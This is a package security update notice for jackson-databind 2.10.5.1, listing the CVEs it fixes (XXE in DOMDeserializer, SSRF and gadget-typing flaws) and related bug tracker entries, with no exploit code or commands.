Security update for jackson-databind
This update for jackson-databind fixes the following issues:
jackson-databind was updated to 2.10.5.1:
* #2589: `DOMDeserializer`: setExpandEntityReferences(false) may
not prevent external entity expansion in all cases
(CVE-2020-25649, bsc#1177616)
* #2787 (partial fix): NPE after add mixin for enum
* #2679: 'ObjectMapper.readValue("123", Void.TYPE)' throws
"should never occur"
This update was imported from the SUSE:SLE-15-SP2:Update update project.
-
Submitted by
Fridrich Strba (fstrba)
Fixed bugs
bnc#1181118
VUL-0: CVE-2021-20190: jackson-databind: SSRF due to mishandling interaction between serialization gadgets and typing
bnc#1180391
VUL-0: CVE-2020-35728: jackson-databind: mishandles the interaction between serialization gadgets and typing
bnc#1177616
VUL-0: CVE-2020-25649: jackson-databind: FasterXML DOMDeserializer insecure entity expansion is vulnerable to XML external entity (XXE)
